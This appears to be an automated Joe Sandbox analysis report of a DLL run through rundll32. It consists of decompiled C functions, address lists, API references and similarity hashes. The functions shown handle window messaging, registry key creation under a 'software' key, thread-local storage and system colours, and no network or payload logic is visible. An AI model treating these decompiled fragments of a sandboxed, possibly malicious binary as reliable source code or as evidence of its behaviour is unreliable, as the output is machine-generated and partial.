                                                                                                        0x1000f7f5
                                                                                                        0x1000f825
                                                                                                        0x1000f826
                                                                                                        0x00000000
                                                                                                        0x1000f82b
                                                                                                        0x1000f751
                                                                                                        0x1000f753
                                                                                                        0x1000f757
                                                                                                        0x1000f759
                                                                                                        0x1000f761
                                                                                                        0x1000f763
                                                                                                        0x1000f763
                                                                                                        0x1000f763
                                                                                                        0x1000f765
                                                                                                        0x1000f76a
                                                                                                        0x1000f76c
                                                                                                        0x1000f770
                                                                                                        0x1000f772
                                                                                                        0x1000f776
                                                                                                        0x1000f785
                                                                                                        0x1000f785
                                                                                                        0x1000f776
                                                                                                        0x1000f770
                                                                                                        0x1000f78b
                                                                                                        0x1000f790
                                                                                                        0x1000f7ad
                                                                                                        0x1000f7ad
                                                                                                        0x00000000
                                                                                                        0x1000f792
                                                                                                        0x1000f79f
                                                                                                        0x1000f7a5
                                                                                                        0x1000f7a9
                                                                                                        0x1000f7ab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f7ab
                                                                                                        0x1000f790
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2853195852-0
                                                                                                        • Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                        • Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
                                                                                                        • Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
                                                                                                        • Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                        				long _v4;
                                                                                                        				char _v28;
                                                                                                        				intOrPtr _v40;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t20;
                                                                                                        				long _t21;
                                                                                                        				struct HWND__* _t22;
                                                                                                        				long _t23;
                                                                                                        				struct HWND__* _t24;
                                                                                                        				long _t25;
                                                                                                        				struct HWND__* _t26;
                                                                                                        				void* _t33;
                                                                                                        				void* _t35;
                                                                                                        				long _t39;
                                                                                                        				long _t41;
                                                                                                        				intOrPtr _t43;
                                                                                                        				struct HWND__* _t47;
                                                                                                        				struct HWND__* _t49;
                                                                                                        				long _t51;
                                                                                                        				long _t53;
                                                                                                        
                                                                                                        				_t46 = __edi;
                                                                                                        				_t39 = __ecx;
                                                                                                        				_t37 = __ebx;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                        					_t51 = E1000A7CE();
                                                                                                        					__eflags = _t51;
                                                                                                        					if(_t51 != 0) {
                                                                                                        						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                        						__eflags = _t20;
                                                                                                        						_t41 = _t51;
                                                                                                        						_pop(_t52);
                                                                                                        						if(_t20 != 0) {
                                                                                                        							_t53 = _t41;
                                                                                                        							_t21 =  *(_t53 + 0x64);
                                                                                                        							__eflags = _t21;
                                                                                                        							if(_t21 == 0) {
                                                                                                        								_pop(_t52);
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								__eflags = _t21 - 0x3f107;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
                                                                                                        									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                        								}
                                                                                                        								return _t21;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							L12:
                                                                                                        							_push(_t41);
                                                                                                        							_push(_t37);
                                                                                                        							_push(0);
                                                                                                        							_push(_t52);
                                                                                                        							_push(_t46);
                                                                                                        							_v4 = _t41;
                                                                                                        							_t22 = GetCapture();
                                                                                                        							_t51 = SendMessageA;
                                                                                                        							_t37 = 0x365;
                                                                                                        							while(1) {
                                                                                                        								_t47 = _t22;
                                                                                                        								__eflags = _t47;
                                                                                                        								if(_t47 == 0) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                        								__eflags = _t23;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									L27:
                                                                                                        									return _t23;
                                                                                                        								} else {
                                                                                                        									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L33;
                                                                                                        							}
                                                                                                        							_t24 = GetFocus();
                                                                                                        							while(1) {
                                                                                                        								_t46 = _t24;
                                                                                                        								__eflags = _t46;
                                                                                                        								if(_t46 == 0) {
                                                                                                        									break;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                        								__eflags = _t23;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									goto L27;
                                                                                                        								} else {
                                                                                                        									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L33;
                                                                                                        							}
                                                                                                        							_t39 = _v4;
                                                                                                        							_t25 = E10010DEC(_t37, _t39, _t46);
                                                                                                        							__eflags = _t25;
                                                                                                        							if(_t25 != 0) {
                                                                                                        								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                        								while(1) {
                                                                                                        									_t49 = _t26;
                                                                                                        									__eflags = _t49;
                                                                                                        									_push(0);
                                                                                                        									if(_t49 == 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                        									__eflags = _t23;
                                                                                                        									if(__eflags == 0) {
                                                                                                        										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									goto L27;
                                                                                                        								}
                                                                                                        								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                        								goto L27;
                                                                                                        							} else {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						L1:
                                                                                                        						_push(0);
                                                                                                        						_push(_t39);
                                                                                                        						_v28 = 0x10057298;
                                                                                                        						E10017C83( &_v28, 0x1002e2fc);
                                                                                                        						asm("int3");
                                                                                                        						_push(4);
                                                                                                        						E10017BC1(E10027DEC, _t37, _t46, _t51);
                                                                                                        						_t43 = E10013965(0x104);
                                                                                                        						_v40 = _t43;
                                                                                                        						_t33 = 0;
                                                                                                        						_v28 = 0;
                                                                                                        						if(_t43 != 0) {
                                                                                                        							_t33 = E1000CF71(_t43);
                                                                                                        						}
                                                                                                        						return E10017C60(_t33);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					__eflags = __eax - 0x3f107;
                                                                                                        					if(__eax != 0x3f107) {
                                                                                                        						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                        					}
                                                                                                        					return __eax;
                                                                                                        				}
                                                                                                        				L33:
                                                                                                        			}
























                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8f
                                                                                                        0x1000aeaa
                                                                                                        0x1000aeac
                                                                                                        0x1000aeae
                                                                                                        0x1000aeb9
                                                                                                        0x1000aebf
                                                                                                        0x1000aec1
                                                                                                        0x1000aec3
                                                                                                        0x1000aec4
                                                                                                        0x100142c8
                                                                                                        0x100142ca
                                                                                                        0x100142cd
                                                                                                        0x100142cf
                                                                                                        0x100142f1
                                                                                                        0x00000000
                                                                                                        0x100142d1
                                                                                                        0x100142d1
                                                                                                        0x100142d6
                                                                                                        0x100142d8
                                                                                                        0x100142e9
                                                                                                        0x100142e9
                                                                                                        0x100142f0
                                                                                                        0x100142f0
                                                                                                        0x1000aec6
                                                                                                        0x10014229
                                                                                                        0x10014229
                                                                                                        0x1001422a
                                                                                                        0x1001422b
                                                                                                        0x1001422c
                                                                                                        0x1001422d
                                                                                                        0x1001422e
                                                                                                        0x10014232
                                                                                                        0x10014238
                                                                                                        0x1001423e
                                                                                                        0x10014257
                                                                                                        0x10014257
                                                                                                        0x10014259
                                                                                                        0x1001425b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001424b
                                                                                                        0x1001424d
                                                                                                        0x1001424f
                                                                                                        0x100142c1
                                                                                                        0x100142c6
                                                                                                        0x10014251
                                                                                                        0x10014252
                                                                                                        0x00000000
                                                                                                        0x10014252
                                                                                                        0x00000000
                                                                                                        0x1001424f
                                                                                                        0x1001425d
                                                                                                        0x10014275
                                                                                                        0x10014275
                                                                                                        0x10014277
                                                                                                        0x10014279
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014269
                                                                                                        0x1001426b
                                                                                                        0x1001426d
                                                                                                        0x00000000
                                                                                                        0x1001426f
                                                                                                        0x10014270
                                                                                                        0x00000000
                                                                                                        0x10014270
                                                                                                        0x00000000
                                                                                                        0x1001426d
                                                                                                        0x1001427b
                                                                                                        0x1001427f
                                                                                                        0x10014284
                                                                                                        0x10014286
                                                                                                        0x10014290
                                                                                                        0x100142a7
                                                                                                        0x100142a7
                                                                                                        0x100142a9
                                                                                                        0x100142ab
                                                                                                        0x100142ac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001429b
                                                                                                        0x1001429d
                                                                                                        0x1001429f
                                                                                                        0x100142a2
                                                                                                        0x00000000
                                                                                                        0x100142a2
                                                                                                        0x00000000
                                                                                                        0x1001429f
                                                                                                        0x100142bf
                                                                                                        0x00000000
                                                                                                        0x10014288
                                                                                                        0x00000000
                                                                                                        0x10014288
                                                                                                        0x10014286
                                                                                                        0x1000aeb0
                                                                                                        0x1000a0db
                                                                                                        0x1000a0db
                                                                                                        0x1000a0de
                                                                                                        0x1000a0e8
                                                                                                        0x1000a0ef
                                                                                                        0x1000a0f4
                                                                                                        0x1000a0f5
                                                                                                        0x1000a0fc
                                                                                                        0x1000a10b
                                                                                                        0x1000a10d
                                                                                                        0x1000a110
                                                                                                        0x1000a114
                                                                                                        0x1000a117
                                                                                                        0x1000a119
                                                                                                        0x1000a119
                                                                                                        0x1000a123
                                                                                                        0x1000a123
                                                                                                        0x1000ae91
                                                                                                        0x1000ae91
                                                                                                        0x1000ae96
                                                                                                        0x00000000
                                                                                                        0x1000ae9d
                                                                                                        0x1000aea3
                                                                                                        0x1000aea3
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 3219385341-0
                                                                                                        • Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                        • Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
                                                                                                        • Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                        • Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000FC8A(intOrPtr* __ecx) {
                                                                                                        				struct HWND__* _v40;
                                                                                                        				struct HWND__* _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				void* _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				long _t43;
                                                                                                        				struct HWND__* _t48;
                                                                                                        				long _t61;
                                                                                                        				intOrPtr* _t63;
                                                                                                        				signed int _t64;
                                                                                                        				void* _t69;
                                                                                                        				intOrPtr _t71;
                                                                                                        				intOrPtr* _t72;
                                                                                                        
                                                                                                        				_t72 = __ecx;
                                                                                                        				_t69 = E1000B510();
                                                                                                        				if(_t69 != 0) {
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                        					}
                                                                                                        					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                        						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                        				if(_t63 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                        					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                        				}
                                                                                                        				_t64 =  *(_t72 + 0x4c);
                                                                                                        				if(_t64 != 0) {
                                                                                                        					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                        				}
                                                                                                        				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                        				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                        				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                        					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                        					if(_t71 != 0) {
                                                                                                        						_t85 =  *(_t71 + 0x20);
                                                                                                        						if( *(_t71 + 0x20) != 0) {
                                                                                                        							E100174D0(_t71,  &_v52, 0, 0x30);
                                                                                                        							_t48 =  *(_t72 + 0x20);
                                                                                                        							_v44 = _t48;
                                                                                                        							_v40 = _t48;
                                                                                                        							_v52 = 0x28;
                                                                                                        							_v48 = 1;
                                                                                                        							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                        				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
                                                                                                        				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                        					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                        					if(_t43 != 0) {
                                                                                                        						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E1000FBD6(_t61, _t72);
                                                                                                        				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                        			}



















                                                                                                        0x1000fc93
                                                                                                        0x1000fc9a
                                                                                                        0x1000fca0
                                                                                                        0x1000fca5
                                                                                                        0x1000fcca
                                                                                                        0x1000fcca
                                                                                                        0x1000fcd0
                                                                                                        0x1000fcd2
                                                                                                        0x1000fcd2
                                                                                                        0x1000fcd0
                                                                                                        0x1000fcd5
                                                                                                        0x1000fcda
                                                                                                        0x1000fcde
                                                                                                        0x1000fce1
                                                                                                        0x1000fce1
                                                                                                        0x1000fce4
                                                                                                        0x1000fcec
                                                                                                        0x1000fcf1
                                                                                                        0x1000fcf1
                                                                                                        0x1000fcf4
                                                                                                        0x1000fcf8
                                                                                                        0x1000fcfb
                                                                                                        0x1000fd02
                                                                                                        0x1000fd07
                                                                                                        0x1000fd09
                                                                                                        0x1000fd0d
                                                                                                        0x1000fd17
                                                                                                        0x1000fd1c
                                                                                                        0x1000fd22
                                                                                                        0x1000fd25
                                                                                                        0x1000fd36
                                                                                                        0x1000fd3d
                                                                                                        0x1000fd40
                                                                                                        0x1000fd40
                                                                                                        0x1000fd0d
                                                                                                        0x1000fd07
                                                                                                        0x1000fd56
                                                                                                        0x1000fd58
                                                                                                        0x1000fd67
                                                                                                        0x1000fd73
                                                                                                        0x1000fd77
                                                                                                        0x1000fd7f
                                                                                                        0x1000fd7f
                                                                                                        0x1000fd77
                                                                                                        0x1000fd87
                                                                                                        0x1000fd9a

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LongWindow$MessageSend_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 2997958587-3887548279
                                                                                                        • Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                        • Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
                                                                                                        • Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                        • Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013E40(intOrPtr __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				int _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _t32;
                                                                                                        
                                                                                                        				_t32 = __ecx;
                                                                                                        				_v24 = __ecx;
                                                                                                        				_v16 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                        					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					RegCloseKey(_v8);
                                                                                                        				}
                                                                                                        				if(_v12 != 0) {
                                                                                                        					RegCloseKey(_v12);
                                                                                                        				}
                                                                                                        				return _v16;
                                                                                                        			}









                                                                                                        0x10013e5b
                                                                                                        0x10013e62
                                                                                                        0x10013e65
                                                                                                        0x10013e68
                                                                                                        0x10013e6b
                                                                                                        0x10013e76
                                                                                                        0x10013ead
                                                                                                        0x10013ead
                                                                                                        0x10013eb8
                                                                                                        0x10013ebd
                                                                                                        0x10013ebd
                                                                                                        0x10013ec2
                                                                                                        0x10013ec7
                                                                                                        0x10013ec7
                                                                                                        0x10013ed0

                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10013EBD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10013EC7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreate$Open
                                                                                                        • String ID: software
                                                                                                        • API String ID: 1740278721-2010147023
                                                                                                        • Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                        • Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
                                                                                                        • Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                        • Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E10013CEE(void* __ecx, long* __edi, void* __esi) {
                                                                                                        				long _t22;
                                                                                                        				void* _t23;
                                                                                                        				void* _t28;
                                                                                                        				void* _t31;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t35;
                                                                                                        				long* _t40;
                                                                                                        				void* _t41;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t41 = __esi;
                                                                                                        				_t40 = __edi;
                                                                                                        				_t31 = __ecx;
                                                                                                        				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                        				E10017C83(0, 0);
                                                                                                        				_t22 = E100134F9(_t31, 0, __edi[3], 4);
                                                                                                        				_t33 = 2;
                                                                                                        				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                        				_t46 = _t23;
                                                                                                        				if(_t23 == 0) {
                                                                                                        					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                        					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
                                                                                                        				}
                                                                                                        				 *(_t41 + 0xc) = _t23;
                                                                                                        				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                        				 *(_t41 + 8) = _t40[3];
                                                                                                        				TlsSetValue( *_t40, _t41);
                                                                                                        				_t35 =  *(_t42 + 8);
                                                                                                        				_t28 =  *(_t41 + 0xc);
                                                                                                        				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                        					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                        				}
                                                                                                        				_push( *(_t42 - 0x14));
                                                                                                        				LeaveCriticalSection();
                                                                                                        				return E10017C60(_t28);
                                                                                                        			}












                                                                                                        0x10013cee
                                                                                                        0x10013cee
                                                                                                        0x10013cee
                                                                                                        0x10013cf5
                                                                                                        0x10013cff
                                                                                                        0x10013d0b
                                                                                                        0x10013d11
                                                                                                        0x10013d16
                                                                                                        0x10013d1c
                                                                                                        0x10013d1e
                                                                                                        0x10013d23
                                                                                                        0x10013d29
                                                                                                        0x10013d29
                                                                                                        0x10013d31
                                                                                                        0x10013d42
                                                                                                        0x10013d4e
                                                                                                        0x10013d53
                                                                                                        0x10013d59
                                                                                                        0x10013d5c
                                                                                                        0x10013d61
                                                                                                        0x10013d6b
                                                                                                        0x10013d6b
                                                                                                        0x10013d6e
                                                                                                        0x10013d74
                                                                                                        0x10013d7f

                                                                                                        APIs
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 10013CFF
                                                                                                          • Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3
                                                                                                        • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                          • Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB
                                                                                                        • _memset.LIBCMT ref: 10013D42
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 356813703-0
                                                                                                        • Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                        • Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
                                                                                                        • Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                        • Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013810(void* __ecx) {
                                                                                                        				struct HBRUSH__* _t14;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t18 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                        				_t14 = GetSysColorBrush(6);
                                                                                                        				 *(_t18 + 0x20) = _t14;
                                                                                                        				return _t14;
                                                                                                        			}





                                                                                                        0x1001381a
                                                                                                        0x10013820
                                                                                                        0x10013827
                                                                                                        0x1001382e
                                                                                                        0x10013835
                                                                                                        0x10013842
                                                                                                        0x10013849
                                                                                                        0x1001384c
                                                                                                        0x1001384f
                                                                                                        0x10013853

                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(0000000F), ref: 1001381C
                                                                                                        • GetSysColor.USER32(00000010), ref: 10013823
                                                                                                        • GetSysColor.USER32(00000014), ref: 1001382A
                                                                                                        • GetSysColor.USER32(00000012), ref: 10013831
                                                                                                        • GetSysColor.USER32(00000006), ref: 10013838
